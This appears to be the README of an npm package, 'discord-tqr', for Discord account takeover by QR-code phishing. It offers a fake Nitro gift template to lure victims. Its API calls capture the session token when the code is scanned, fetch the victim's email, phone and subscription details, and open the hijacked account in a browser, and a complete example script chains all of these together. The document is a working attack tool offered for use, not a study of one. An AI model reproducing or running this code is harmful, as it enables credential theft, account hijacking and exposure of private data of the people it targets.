
Generate QR code to get user token to login in, get informations ...

MIT License



Generate QR code to get user token to take control of the account, get informations ...


See the changelog

💻 Installation

$ npm i discord-tqr

📚 Usage


import DiscordTQR from "discord-tqr";
const DiscordTQR = require("discord-tqr").default;


const handler = new DiscordTQR();

Generate a QR Code


  • path?: string - Path where you want to save the QR code in png format
  • template?: "default" | { path: string, x?: number, y?: number, width?: number, height?: number } - If you want to apply a template to the QR code. With "default" you can create a fake nitro gift. You can also make a custom one with path for the template image and x, y, width, height for the x/y position of the QR code on the template and the width/height for the size of the QR code on the template.
  • wait?: number - If you have trouble when getting the QR Code you can wait full page loaded by setting a wait time in ms like 5000 (by default it's 0).
  • browserOptions?: PuppeteerLaunchOptions - Browser options for puppeter by default it's { headless: true, defaultViewport: null }
const base64QrCode = await handler.getQRCode(options?: {
    path?: string,
    browserOptions?: PuppeteerLaunchOptions,
    wait?: number,
    template?: "default" | { path?: string, x?: number, y?: number, width?: number, height?: number },
    encoding?: string

Listening for token

NOTE: This method work only if you launch "getQRCode" before. It can also be block by a recaptcha

Return the token in a string when the QR code is scanned

const token = await handler.listenForToken();

Get user informations

Return a json object with user informations like subscription, email, phone, avatar, name ...


  • token?: string - The token of the user by default it's the token from listForToken method
const user = await handler.getDiscordAccountInfo(token?: string);


  id: '...',
  username: '...',
  avatar: '...',
  avatar_decoration: null,
  discriminator: '...',
  public_flags: 0,
  flags: 0,
  banner: null,
  banner_color: null,
  accent_color: null,
  bio: '...',
  locale: 'fr',
  nsfw_allowed: true,
  mfa_enabled: false,
  email: '...',
  verified: true,
  phone: "...",
  user: '...#...',
  avatar_url: 'https://cdn.discordapp.com/avatars/...',
  subscription: [...]

Open user account

Open a discord account in chromium with puppeteer and with the token


  • token?: string - The token of the user by default it's the token from listForToken method
  • browserOptions?: PuppeteerLaunchOptions - Browser options for puppeter by default it's { headless: false, defaultViewport: null, args: ["--start-fullscreen"] }
const {browser, page} = await handler.openDiscordAccount(options?: { token?: string, browserOptions?: PuppeteerLaunchOptions });

Close browser for QR code generation

Close the browser used for generating the QR Code and by listenForToken

await handler.closeConnection();


const path = require("path");
const DiscordTQR = require("discord-tqr").default;

(async function () {
  try {
    const handler = new DiscordTQR();

    console.log("Creating qr code...");
    await handler.getQRCode({
      path: path.resolve(__dirname, "./qr-with-template.png"),
      template: "default",
    console.log("QR code created to ./qr-with-template.png !");

    console.log("Waiting for token...");
    await handler.listenForToken();
    console.log("Token: ", handler.token);

    console.log("Getting user informations...");
    await handler.getDiscordAccountInfo();
    console.log("User information:", handler.user);

    console.log("Opening user account...");
    const { browser, page } = await handler.openDiscordAccount();

    setTimeout(async () => {
      console.log("Closing opened browser...");
      await browser.close();
    }, 60000);

    console.log("Closing connection...");
    await handler.closeConnection();
  } catch (e) {